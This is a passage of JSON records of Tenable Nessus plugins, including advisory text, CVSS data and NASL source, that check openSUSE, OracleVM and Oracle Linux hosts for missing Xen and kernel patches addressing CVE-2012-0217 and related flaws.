reference:\"xen-tools-domU-debuginfo-4.1.2_17-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", cpu:\"x86_64\", reference:\"xen-4.1.2_17-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", cpu:\"x86_64\", reference:\"xen-doc-html-4.1.2_17-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", cpu:\"x86_64\", reference:\"xen-doc-pdf-4.1.2_17-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", cpu:\"x86_64\", reference:\"xen-libs-32bit-4.1.2_17-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", cpu:\"x86_64\", reference:\"xen-libs-debuginfo-32bit-4.1.2_17-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", cpu:\"x86_64\", reference:\"xen-tools-4.1.2_17-1.10.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.1\", cpu:\"x86_64\", reference:\"xen-tools-debuginfo-4.1.2_17-1.10.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, 
tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xen\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T12:25:19", "description": "This update of XEN fixed multiple security flaws that could be\nexploited by local attackers to cause a Denial of Service or\npotentially escalate privileges. Additionally, several other upstream\nchanges were backported.", "edition": 18, "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : xen (openSUSE-2012-404)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0029", "CVE-2012-0217", "CVE-2012-0218", "CVE-2012-2934"], "modified": "2014-06-13T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:xen-doc-html", "p-cpe:/a:novell:opensuse:xen-devel", "p-cpe:/a:novell:opensuse:xen-kmp-desktop", "p-cpe:/a:novell:opensuse:xen-kmp-pae", "p-cpe:/a:novell:opensuse:xen", "p-cpe:/a:novell:opensuse:xen-tools-debuginfo", "p-cpe:/a:novell:opensuse:xen-kmp-default-debuginfo", "cpe:/o:novell:opensuse:11.4", "p-cpe:/a:novell:opensuse:xen-doc-pdf", "p-cpe:/a:novell:opensuse:xen-kmp-pae-debuginfo", "p-cpe:/a:novell:opensuse:xen-libs", "p-cpe:/a:novell:opensuse:xen-tools-domU-debuginfo", "p-cpe:/a:novell:opensuse:xen-libs-debuginfo", "p-cpe:/a:novell:opensuse:xen-debugsource", "p-cpe:/a:novell:opensuse:xen-tools", "p-cpe:/a:novell:opensuse:xen-kmp-desktop-debuginfo", "p-cpe:/a:novell:opensuse:xen-tools-domU", "p-cpe:/a:novell:opensuse:xen-kmp-default"], "id": "OPENSUSE-2012-404.NASL", "href": "https://www.tenable.com/plugins/nessus/74683", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2012-404.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(74683);\n script_version(\"1.5\");\n 
script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2012-0029\", \"CVE-2012-0217\", \"CVE-2012-0218\", \"CVE-2012-2934\");\n\n script_name(english:\"openSUSE Security Update : xen (openSUSE-2012-404)\");\n script_summary(english:\"Check for the openSUSE-2012-404 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update of XEN fixed multiple security flaws that could be\nexploited by local attackers to cause a Denial of Service or\npotentially escalate privileges. Additionally, several other upstream\nchanges were backported.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=649209\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=683580\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=691256\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=694863\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=701686\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=704160\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=706106\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=706574\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=708025\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=712051\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"https://bugzilla.novell.com/show_bug.cgi?id=712823\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=714183\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=715655\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=716695\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=725169\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=726332\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=727515\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=732782\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=734826\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=736824\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=739585\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=740165\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=746702\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=757537\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=757970\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=764077\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected xen packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:M/Au:S/C:C/I:C/A:C\");\n 
script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'FreeBSD Intel SYSRET Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-doc-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-doc-pdf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-kmp-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-libs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:novell:opensuse:xen-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-tools-domU\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:xen-tools-domU-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/01/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/07/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.4)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.4\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.4\", reference:\"xen-4.0.3_04-42.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", 
reference:\"xen-debugsource-4.0.3_04-42.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"xen-devel-4.0.3_04-42.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"xen-doc-html-4.0.3_04-42.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"xen-doc-pdf-4.0.3_04-42.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"xen-kmp-default-4.0.3_04_k2.6.37.6_0.20-42.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"xen-kmp-default-debuginfo-4.0.3_04_k2.6.37.6_0.20-42.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"xen-kmp-desktop-4.0.3_04_k2.6.37.6_0.20-42.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"xen-kmp-desktop-debuginfo-4.0.3_04_k2.6.37.6_0.20-42.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"xen-kmp-pae-4.0.3_04_k2.6.37.6_0.20-42.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"xen-kmp-pae-debuginfo-4.0.3_04_k2.6.37.6_0.20-42.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"xen-libs-4.0.3_04-42.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"xen-libs-debuginfo-4.0.3_04-42.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"xen-tools-4.0.3_04-42.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"xen-tools-debuginfo-4.0.3_04-42.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"xen-tools-domU-4.0.3_04-42.4\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"xen-tools-domU-debuginfo-4.0.3_04-42.4\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xen / xen-debugsource / xen-devel / xen-doc-html / xen-doc-pdf / etc\");\n}\n", "cvss": {"score": 7.4, "vector": "AV:A/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T13:23:10", 
"description": "The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - CVE-2012-0217 CVE-2012-0218: guest DoS on\n syscall/sysenter exception generation [orabug 13993157]", "edition": 29, "published": "2014-11-26T00:00:00", "title": "OracleVM 2.2 : xen (OVMSA-2012-0022)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0217", "CVE-2012-0218"], "modified": "2014-11-26T00:00:00", "cpe": ["p-cpe:/a:oracle:vm:xen-64", "p-cpe:/a:oracle:vm:xen-devel", "p-cpe:/a:oracle:vm:xen-debugger", "cpe:/o:oracle:vm_server:2.2", "p-cpe:/a:oracle:vm:xen-pvhvm-devel", "p-cpe:/a:oracle:vm:xen", "p-cpe:/a:oracle:vm:xen-tools"], "id": "ORACLEVM_OVMSA-2012-0022.NASL", "href": "https://www.tenable.com/plugins/nessus/79478", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2012-0022.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79478);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2012-0217\", \"CVE-2012-0218\");\n script_bugtraq_id(53856, 53955);\n\n script_name(english:\"OracleVM 2.2 : xen (OVMSA-2012-0022)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - CVE-2012-0217 CVE-2012-0218: guest DoS on\n syscall/sysenter exception generation [orabug 13993157]\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/oraclevm-errata/2012-June/000084.html\"\n );\n 
script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'FreeBSD Intel SYSRET Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:xen-64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:xen-debugger\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:xen-pvhvm-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:xen-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:2.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/06/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/06/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is 
owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"2\\.2\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 2.2\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS2.2\", reference:\"xen-3.4.0-0.1.39.el5\")) flag++;\nif (rpm_check(release:\"OVS2.2\", reference:\"xen-64-3.4.0-0.1.39.el5\")) flag++;\nif (rpm_check(release:\"OVS2.2\", reference:\"xen-debugger-3.4.0-0.1.39.el5\")) flag++;\nif (rpm_check(release:\"OVS2.2\", reference:\"xen-devel-3.4.0-0.1.39.el5\")) flag++;\nif (rpm_check(release:\"OVS2.2\", reference:\"xen-pvhvm-devel-3.4.0-0.1.39.el5\")) flag++;\nif (rpm_check(release:\"OVS2.2\", reference:\"xen-tools-3.4.0-0.1.39.el5\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"xen / xen-64 / xen-debugger / xen-devel / xen-pvhvm-devel / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T12:46:58", "description": 
"From Red Hat Security Advisory 2012:0721 :\n\nUpdated kernel packages that fix two security issues are now available\nfor Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues :\n\n* It was found that the Xen hypervisor implementation as shipped with\nRed Hat Enterprise Linux 5 did not properly restrict the syscall\nreturn addresses in the sysret return path to canonical addresses. An\nunprivileged user in a 64-bit para-virtualized guest, that is running\non a 64-bit host that has an Intel CPU, could use this flaw to crash\nthe host or, potentially, escalate their privileges, allowing them to\nexecute arbitrary code at the hypervisor level. (CVE-2012-0217,\nImportant)\n\n* It was found that guests could trigger a bug in earlier AMD CPUs,\nleading to a CPU hard lockup, when running on the Xen hypervisor\nimplementation. An unprivileged user in a 64-bit para-virtualized\nguest could use this flaw to crash the host. Warning: After installing\nthis update, hosts that are using an affected AMD CPU (refer to Red\nHat Bugzilla bug #824966 for a list) will fail to boot. In order to\nboot such hosts, the new kernel parameter, allow_unsafe, can be used\n('allow_unsafe=on'). This option should only be used with hosts that\nare running trusted guests, as setting it to 'on' reintroduces the\nflaw (allowing guests to crash the host). (CVE-2012-2934, Moderate)\n\nNote: For Red Hat Enterprise Linux guests, only privileged guest users\ncan exploit the CVE-2012-0217 and CVE-2012-2934 issues.\n\nRed Hat would like to thank the Xen project for reporting these\nissues. 
Upstream acknowledges Rafal Wojtczuk as the original reporter\nof CVE-2012-0217.\n\nUsers should upgrade to these updated packages, which contain\nbackported patches to correct these issues. The system must be\nrebooted for this update to take effect.", "edition": 23, "published": "2013-07-12T00:00:00", "title": "Oracle Linux 5 : kernel (ELSA-2012-0721-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-0217", "CVE-2012-2934"], "modified": "2013-07-12T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:kernel-debug", "p-cpe:/a:oracle:linux:kernel-devel", "p-cpe:/a:oracle:linux:kernel-doc", "p-cpe:/a:oracle:linux:kernel-PAE", "cpe:/o:oracle:linux:5", "p-cpe:/a:oracle:linux:kernel-xen-devel", "p-cpe:/a:oracle:linux:kernel-debug-devel", "p-cpe:/a:oracle:linux:kernel-headers", "p-cpe:/a:oracle:linux:kernel-PAE-devel", "p-cpe:/a:oracle:linux:kernel", "p-cpe:/a:oracle:linux:kernel-xen"], "id": "ORACLELINUX_ELSA-2012-0721-1.NASL", "href": "https://www.tenable.com/plugins/nessus/68539", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2012:0721 and \n# Oracle Linux Security Advisory ELSA-2012-0721-1 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(68539);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2012-0217\", \"CVE-2012-2934\");\n script_bugtraq_id(53856, 53961);\n script_xref(name:\"RHSA\", value:\"2012:0721\");\n\n script_name(english:\"Oracle Linux 5 : kernel (ELSA-2012-0721-1)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n 
value:\n\"From Red Hat Security Advisory 2012:0721 :\n\nUpdated kernel packages that fix two security issues are now available\nfor Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues :\n\n* It was found that the Xen hypervisor implementation as shipped with\nRed Hat Enterprise Linux 5 did not properly restrict the syscall\nreturn addresses in the sysret return path to canonical addresses. An\nunprivileged user in a 64-bit para-virtualized guest, that is running\non a 64-bit host that has an Intel CPU, could use this flaw to crash\nthe host or, potentially, escalate their privileges, allowing them to\nexecute arbitrary code at the hypervisor level. (CVE-2012-0217,\nImportant)\n\n* It was found that guests could trigger a bug in earlier AMD CPUs,\nleading to a CPU hard lockup, when running on the Xen hypervisor\nimplementation. An unprivileged user in a 64-bit para-virtualized\nguest could use this flaw to crash the host. Warning: After installing\nthis update, hosts that are using an affected AMD CPU (refer to Red\nHat Bugzilla bug #824966 for a list) will fail to boot. In order to\nboot such hosts, the new kernel parameter, allow_unsafe, can be used\n('allow_unsafe=on'). This option should only be used with hosts that\nare running trusted guests, as setting it to 'on' reintroduces the\nflaw (allowing guests to crash the host). (CVE-2012-2934, Moderate)\n\nNote: For Red Hat Enterprise Linux guests, only privileged guest users\ncan exploit the CVE-2012-0217 and CVE-2012-2934 issues.\n\nRed Hat would like to thank the Xen project for reporting these\nissues. 
Upstream acknowledges Rafal Wojtczuk as the original reporter\nof CVE-2012-0217.\n\nUsers should upgrade to these updated packages, which contain\nbackported patches to correct these issues. The system must be\nrebooted for this update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2012-June/002865.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'FreeBSD Intel SYSRET Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-PAE\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-PAE-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-doc\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/06/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! 
